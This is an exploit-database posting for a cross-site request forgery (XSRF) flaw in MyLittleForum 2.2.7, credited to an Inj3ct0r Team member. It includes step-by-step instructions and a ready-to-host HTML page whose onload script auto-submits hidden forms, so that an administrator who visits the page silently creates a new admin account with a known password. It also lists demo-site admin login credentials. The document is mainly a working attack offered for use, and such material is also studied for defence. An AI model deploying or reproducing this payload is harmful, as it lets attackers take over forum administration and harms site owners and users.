#(+) Exploit Title: MyLittleForum 2.2.7 CMS XSRF Vulnerability (Add new user) #(+) Author : ^Xecuti0n3r #(+) E-mail : xecuti0n3r()yahoo.com #(+) Category : Web Apps [XSRF] #(+) Demo Link : http://www.cmsagora.com/demo.php?id=118&type=2 #(+) Demo Link2:http://demo.opensourcecms.com:80/mylittleforum/index.php #(+) Demo Login: Username: admin Password: demo123 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' \ __ /'__`\ /\ \__ /'__`\ 0 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1 1 \ \____/ >> Exploit database separated by exploit 0 0 \/___/ type (local, remote, DoS, etc.) 1 1 1 0 [+] Site : 1337day.com 0 1 [+] Support e-mail : submit[at]1337day.com 1 0 0 1 ######################################### 1 0 I'm ^Xecuti0n3r member from Inj3ct0r Team 1 1 ######################################### 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 #All you have to do is save the below code as exploit.html #Then Host a website with the exploit.html file. A person with admin permissions if visits the site, # will automatically creat user admin4 with password "newpassword" without warning ;) ____________________________________________________________________ ____________________________________________________________________ Code: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>MyLittleForum 2.2.7 CMS XSRF Vulnerability</title> </head> <body onload="javascript:fireForms()"> <script language="JavaScript"> function fireForms() { var count = 2; var i=0; for(i=0; i<count; i++) { document.forms[i].submit(); } } </script> <H2>MyLittleForum 2.2.7 CMS XSRF Vulnerability</H2> <form method="POST" name="form0" action="http://localhost"> <input type="hidden" name="mode" value="admin"/> <input type="hidden" name="ar_username" value="admin4"/> <input type="hidden" name="ar_email" value="admin@admin.com"/> <input type="hidden" name="ar_pw" value="newpassword"/> <input type="hidden" name="ar_pw_conf" value="newpassword"/> <input type="hidden" name="register_submit" value=" OK "/> </form> </body> </html> ######################################################################## (+)Exploit Coded by: ^Xecuti0N3r (+)Special Thanks to: MaxCaps, d3M0l!tioN3r, aNnIh!LatioN3r (+)Gr33ts to : Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (www.1337day.com) + All the 31337 Members :) (+)<3 to :Indian Cyber Army & Indishell Crew (+)Gr33ts to : exploit-id.com , packetstormsecurity.org , securityreason.com ########################################################################